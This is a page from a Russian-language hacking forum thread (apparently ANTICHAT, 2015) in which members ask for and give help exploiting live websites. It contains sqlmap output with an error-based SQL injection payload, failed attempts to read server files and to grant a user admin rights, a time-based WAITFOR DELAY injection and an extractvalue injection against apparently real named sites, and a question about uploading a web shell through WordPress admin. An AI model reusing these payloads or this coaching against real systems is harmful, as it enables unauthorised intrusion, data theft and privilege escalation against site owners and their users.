HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Перезагрузить страницу Ваши вопросы по уязвимостям.
   
Ответ
Страница 6 из 296 « Первая < 2 3 4 5 6 7 8 9 10 1656106 > Последняя »
 
Опции темы Поиск в этой теме Опции просмотра

  #51  
Старый 13.05.2015, 03:55
faza02
Banned
Регистрация: 21.11.2007
Сообщений: 181
С нами: 9721141

Репутация: 1013
По умолчанию
Цитата:
Сообщение от kacergei  

Имеется сайт с sql-injections, но возникли впоросы с sqlmap
Код:
[Linux Debian] [Apache 2.4.10] [MySQL 5.0] ['10.0.16-MariaDB-1']
Privilege: USAGE
Type: error-based
Title: MySQL >= 5.0 error-based - Parameter replace
Payload: http://site.com/news.html?id=(SELECT 1582 FROM(SELECT COUNT(*),CONCAT(0x7171766a71,(SELECT (ELT(1582=1582,1))),0x71706b6b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&cat=main
Не работает --file-read="/home/www/wwuser/user/www/index.php" (или тот же .htaccess, js не важно)
Выдает пустой файл:
Spoiler: Результат
Код:
[WARNING] reflective value(s) found and filtering out
[INFO] retrieved:
[WARNING] it looks like the file has not been written (usually occurs if the DBMS process' user has no write privileges in the destination path)
files saved to [1]:[*] C:\sqlmap\output\site.com\files\_home_www_wwuser_user_www_index.php (size differs from remote file)
И тот же вопрос по --sql-query="UPDATE users SET admin=1 WHERE login=test" (как только не пробовал)
Spoiler: Результат
Код:
[WARNING] execution of custom SQL queries is only available when stacked queries are supported
UPDATE UPDATE users SET admin=1 WHERE login=test:        None
[INFO] fetched data logged to text files under 'C:\sqlmap\output\site.com\'
Это из-за нехватки прав? Или что то другое мешает?
ну как бы для чтения файлов у вашего пользователя должны быть права file_priv, а для update в mysql нужна sqli в update. тут разделяются запросы на выборку и на изменение информации
 
Ответить с цитированием

  #52  
Старый 13.05.2015, 11:57
frank
Участник форума
Регистрация: 08.05.2015
Сообщений: 200
С нами: 5798486

Репутация: 28
По умолчанию
Доброго дня...

Есть LFI подскажет кто?

Код HTML:
goo.gl/d1mQnC
 
Ответить с цитированием

  #53  
Старый 13.05.2015, 13:20
vikler
Познающий
Регистрация: 16.08.2012
Сообщений: 92
С нами: 7231286

Репутация: 0
По умолчанию
Код:
http://www.scalarchives.com/web/ricerca_risultati.asp?SC_PROV=COLL&IdCollection=82993'
помогите с раскруткой
 
Ответить с цитированием

  #54  
Старый 13.05.2015, 13:38
faza02
Banned
Регистрация: 21.11.2007
Сообщений: 181
С нами: 9721141

Репутация: 1013
По умолчанию
Цитата:
Сообщение от vikler  

Код:
http://www.scalarchives.com/web/ricerca_risultati.asp?SC_PROV=COLL&IdCollection=82993'
помогите с раскруткой
Код:
http://www.scalarchives.com/web/ricerca_risultati.asp?SC_PROV=COLL&IdCollection=82993%27;WAITFOR%20DELAY%20%270:0:1%27--
 
Ответить с цитированием

  #55  
Старый 13.05.2015, 13:51
vikler
Познающий
Регистрация: 16.08.2012
Сообщений: 92
С нами: 7231286

Репутация: 0
По умолчанию
Цитата:
Сообщение от faza02  

Код:
http://www.scalarchives.com/web/ricerca_risultati.asp?SC_PROV=COLL&IdCollection=82993%27;WAITFOR%20DELAY%20%270:0:1%27--
Incorrect syntax near '; WAITFOR DELAY'.
 
Ответить с цитированием

  #56  
Старый 13.05.2015, 14:28
faza02
Banned
Регистрация: 21.11.2007
Сообщений: 181
С нами: 9721141

Репутация: 1013
По умолчанию
Цитата:
Сообщение от vikler  

Incorrect syntax near '; WAITFOR DELAY'.
тем не менее, задержка есть. попробуйте 0 и 1
 
Ответить с цитированием

  #57  
Старый 13.05.2015, 16:16
DezMond™
Участник форума
Регистрация: 10.01.2008
Сообщений: 199
С нами: 9650336

Репутация: 662
По умолчанию
 
Ответить с цитированием

  #58  
Старый 13.05.2015, 16:36
faza02
Banned
Регистрация: 21.11.2007
Сообщений: 181
С нами: 9721141

Репутация: 1013
По умолчанию
Цитата:
Сообщение от DezMond™  
Цитата:
Сообщение от DezMond™  
Код:
http://o53xo.nbqweyjomnua.cmle.ru/?id_mitteilungeneintraege=-77+and%28extractvalue%281,/*!concat*/%280x3a,%28select+table_name+from+information_schema.tables+limit+1,1%29%29%29%29&typ=4
реакция на связку union select from. select from пропускает, поэтому здесь подходит error-based
 
Ответить с цитированием

  #59  
Старый 14.05.2015, 01:14
vikler
Познающий
Регистрация: 16.08.2012
Сообщений: 92
С нами: 7231286

Репутация: 0
По умолчанию
Какие способы заливки шелла через wpadmin, если там а) отключено редактирование тем и плагинов б) невозможно загружать php ?
 
Ответить с цитированием

  #60  
Старый 14.05.2015, 01:52
faza02
Banned
Регистрация: 21.11.2007
Сообщений: 181
С нами: 9721141

Репутация: 1013
По умолчанию
Цитата:
Сообщение от vikler  

Какие способы заливки шелла через wpadmin, если там а) отключено редактирование тем и плагинов б) невозможно загружать php ?
архив с темой тоже нельзя загрузить? какая версия wp?

из этой темы все попробовали? https://rdot.org/forum/showthread.php?t=3
 
Ответить с цитированием
Ответ
Страница 6 из 296 « Первая < 2 3 4 5 6 7 8 9 10 1656106 > Последняя »



Предыдущая тема Следующая тема

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.